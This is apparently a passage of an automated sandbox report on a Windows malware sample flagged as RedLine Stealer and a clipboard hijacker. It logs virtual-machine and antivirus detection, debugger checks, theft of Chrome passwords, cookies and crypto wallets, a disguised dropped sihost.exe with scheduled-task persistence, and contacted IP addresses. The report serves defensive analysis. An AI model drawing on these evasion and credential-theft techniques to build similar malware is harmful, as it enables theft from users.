                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Contains functionality to compare user and computer (likely to detect sandboxes)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess,11_2_00401272
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess,11_2_02C614C2
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeCode function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess,14_2_02C614C2
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe TID: 7144Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe TID: 4280Thread sleep count: 298 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe TID: 4280Thread sleep time: -67050s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWindow / User API: threadDelayed 1511Jump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWindow / User API: threadDelayed 7573Jump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.445386664.0000000008830000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.445386664.0000000008830000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware694_EA66Win32_VideoController1_SV2HVUVideoController120060621000000.000000-0000074.129display.infMSBDA3CGN14WBPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsRFMZTRZ6
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_0040E650 _memset,_memset,_memset,_memset,InterlockedIncrement,__itow_s,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcscpy_s,_wcscpy_s,_wcscat_s,_wcscat_s,_wcscat_s,__snwprintf_s,_wcscpy_s,_wcscpy_s,__cftoe,_wcscpy_s,__lock,GetFileType,_wcslen,WriteConsoleW,GetLastError,__cftoe,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,11_2_0040E650
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0040ADB0 GetProcessHeap,HeapFree,1_2_0040ADB0
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_02C6092B mov eax, dword ptr fs:[00000030h]11_2_02C6092B
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_02C60D90 mov eax, dword ptr fs:[00000030h]11_2_02C60D90
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeCode function: 14_2_02C60D90 mov eax, dword ptr fs:[00000030h]14_2_02C60D90
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeCode function: 14_2_02C6092B mov eax, dword ptr fs:[00000030h]14_2_02C6092B
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040E61C
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00416F6A
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004123F1 SetUnhandledExceptionFilter,1_2_004123F1
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_00408740 SetUnhandledExceptionFilter,11_2_00408740
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_0040BF70 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040BF70
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeCode function: 14_2_00408740 SetUnhandledExceptionFilter,14_2_00408740
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeCode function: 14_2_0040BF70 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040BF70
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe 'C:\Users\user\AppData\Local\Temp\filename.exe' Jump to behavior
                      Source: sihost.exe, 0000000E.00000002.610518805.0000000003390000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: sihost.exe, 0000000E.00000002.610518805.0000000003390000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: sihost.exe, 0000000E.00000002.610518805.0000000003390000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: sihost.exe, 0000000E.00000002.610518805.0000000003390000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: GetLocaleInfoA,1_2_00417A20
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_004199E0 GetLastError,GetPrivateProfileIntW,GetLastError,GetNumberFormatA,GetCPInfoExW,GetCommandLineW,GetStartupInfoA,SetFileShortNameA,CreateNamedPipeA,GetBinaryType,HeapDestroy,11_2_004199E0
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00412A15
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.445636193.000000000890F000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.31a0ee8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.31a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.49ec996.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.49ec996.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.31a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.4c50000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.4c50000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.31a0ee8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.436050083.00000000049AC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.349530777.0000000002E0D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.441094022.0000000005E04000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.436773793.0000000004C50000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: eYvT1lg5Dy.exe PID: 6504, type: MEMORYSTR
                      Yara detected Clipboard HijackerShow sources
                      Source: Yara matchFile source: 11.2.filename.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.sihost.exe.2c70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.filename.exe.2c70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.sihost.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.filename.exe.2c60e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.sihost.exe.2c60e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.sihost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.filename.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.448804837.0000000002C70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.609430439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.432844510.0000000002C70000.00000004.00000001.sdmp, type: MEMORY
                      Tries to steal Crypto Currency WalletsShow sources
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.31a0ee8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.31a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.49ec996.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.49ec996.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.31a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.4c50000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.4c50000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.eYvT1lg5Dy.exe.31a0ee8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.436050083.00000000049AC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.349530777.0000000002E0D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.441094022.0000000005E04000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.436773793.0000000004C50000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: eYvT1lg5Dy.exe PID: 6504, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation221Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Scheduled Task/Job1Process Injection13Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter2Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information2Security Account ManagerSystem Information Discovery134SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Software Packing21NTDSSecurity Software Discovery471Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion231SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion231Cached Domain CredentialsProcess Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection13DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 490258 Sample: eYvT1lg5Dy.exe Startdate: 25/09/2021 Architecture: WINDOWS Score: 100 49 Found malware configuration 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected Clipboard Hijacker 2->53 55 2 other signatures 2->55 8 eYvT1lg5Dy.exe 15 30 2->8         started        13 sihost.exe 2->13         started        process3 dnsIp4 35 80.87.192.249, 16640, 49737 THEFIRST-ASRU Russian Federation 8->35 37 s3-r-w.us-east-2.amazonaws.com 52.219.104.152, 443, 49741 AMAZON-02US United States 8->37 39 2 other IPs or domains 8->39 29 C:\Users\user\AppData\Local\...\filename.exe, PE32 8->29 dropped 31 C:\Users\user\AppData\...\eYvT1lg5Dy.exe.log, ASCII 8->31 dropped 57 Detected unpacking (changes PE section rights) 8->57 59 Detected unpacking (overwrites its own PE header) 8->59 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->61 69 3 other signatures 8->69 15 filename.exe 1 8->15         started        19 conhost.exe 8->19         started        63 Multi AV Scanner detection for dropped file 13->63 65 Machine Learning detection for dropped file 13->65 67 Contains functionality to compare user and computer (likely to detect sandboxes) 13->67 21 schtasks.exe 1 13->21         started        file5 signatures6 process7 file8 33 C:\Users\user\AppData\Roaming\...\sihost.exe, PE32 15->33 dropped 41 Multi AV Scanner detection for dropped file 15->41 43 Detected unpacking (changes PE section rights) 15->43 45 Detected unpacking (overwrites its own PE header) 15->45 47 3 other signatures 15->47 23 schtasks.exe 1 15->23         started        25 conhost.exe 21->25         started        signatures9 process10 process11 27 conhost.exe 23->27         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      eYvT1lg5Dy.exe49%VirustotalBrowse
                      eYvT1lg5Dy.exe34%MetadefenderBrowse
                      eYvT1lg5Dy.exe81%ReversingLabsWin32.Ransomware.WannaCry
                      eYvT1lg5Dy.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
